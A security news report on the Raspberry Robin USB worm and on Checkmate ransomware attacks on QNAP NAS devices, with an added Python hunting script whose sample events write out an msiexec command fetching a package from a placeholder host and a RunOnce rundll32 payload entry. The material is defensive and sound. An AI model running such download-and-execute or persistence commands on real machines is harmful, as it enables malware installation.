Cybersecurity researchers are drawing attention to a continuing wave of attacks linked to a cluster of activity tracked as Raspberry Robin, a Windows malware with worm-like capabilities.
Describing it as a “persistent” and “spreading” threat, Cybereason said it observed a number of victims in Europe.
The infections involve a worm that spreads via removable USB devices containing a malicious .LNK file and uses compromised QNAP network-attached storage (NAS) devices for command and control. It was first documented by Red Canary researchers in May 2022.
Also tracked as QNAP worm by Sekoia, the malware abuses a legitimate Windows installer binary, “msiexec.exe”, to download and execute a malicious shared library (DLL) from a compromised QNAP NAS device.
“To make detection more difficult, Raspberry Robin leverages process injections into three legitimate Windows system processes,” Cybereason researcher Loïc Castel said in a technical post, adding that it “communicates with the rest of [the] infrastructure via the TOR exit nodes.”
Persistence on the compromised machine is achieved by modifying the Windows Registry so that the malicious payload is loaded through the Windows binary “rundll32.exe” during the boot phase.
The campaign, which is believed to date back to September 2021, has remained a mystery so far, with no clues as to the threat actor’s origin or end goals.
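The two behaviours described above (msiexec.exe fetching a package from a remote host, and a Run key that launches a payload through rundll32.exe) are the kind of telemetry a defender can hunt for. The following is an added detection example, not code from Cybereason or Red Canary; the event records and the host name nas.example.invalid are constructed placeholders, and the record layout is an assumption standing in for real process-creation and registry-write logs.

```python
import re

# Constructed sample telemetry (not from the article). "proc" records mimic
# process-creation events, "reg" records mimic registry value writes.
SAMPLE_EVENTS = [
    {"type": "proc", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /q /i http://nas.example.invalid:8080/pkg.msi"},  # placeholder host
    {"type": "proc", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\7zip.msi"},          # benign local install
    {"type": "reg", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce",
     "value": r"rundll32.exe C:\ProgramData\x\payload.dll,Entry"},              # boot-time persistence
    {"type": "reg", "key": r"HKLM\Software\Vendor\App",
     "value": "rundll32.exe shell32.dll,Control_RunDLL"},                       # rundll32 outside a Run key
]

REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
RUNDLL32 = re.compile(r"\brundll32(\.exe)?\b", re.IGNORECASE)


def detect_indicators(events):
    """Return (rule_name, event) pairs for events matching the two behaviours.

    Rule 1: msiexec.exe invoked with a remote http(s) package location, i.e. the
            installer being used as a downloader rather than installing a local file.
    Rule 2: a Run/RunOnce registry value that starts rundll32.exe, i.e. a DLL
            being loaded at logon/boot through a living-off-the-land binary.
    """
    findings = []
    for ev in events:
        if ev["type"] == "proc":
            if ev["image"].lower().endswith("msiexec.exe") and REMOTE_URL.search(ev["cmdline"]):
                findings.append(("msiexec_remote_package", ev))
        elif ev["type"] == "reg":
            if RUN_KEY.search(ev["key"]) and RUNDLL32.search(ev["value"]):
                findings.append(("run_key_rundll32_persistence", ev))
    return findings


if __name__ == "__main__":
    for rule, ev in detect_indicators(SAMPLE_EVENTS):
        print(rule, "->", ev.get("cmdline") or ev.get("value"))
```

Both rules will also fire on some legitimate administration activity, so they are hunting queries to triage alongside the USB and QNAP context described above, not block-on-sight signatures.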
The disclosure comes as QNAP said it is actively investigating a new wave of Checkmate ransomware infections targeting its devices, making it the latest in a string of attacks after AgeLocker, eCh0raix and DeadBolt.
“Preliminary investigation indicates that Checkmate attacks via SMB services exposed to the Internet and uses a dictionary attack to crack accounts with weak passwords,” the company noted in a notice.
“Once the attacker successfully connects to a device, he encrypts data in shared folders and leaves a ransom note with filename ‘!CHECKMATE_DECRYPTION_README’ in each folder.”
As a precaution, the Taiwanese company recommends that customers not expose SMB services to the Internet, improve password strength, perform regular backups, and update QNAP OS to the latest version.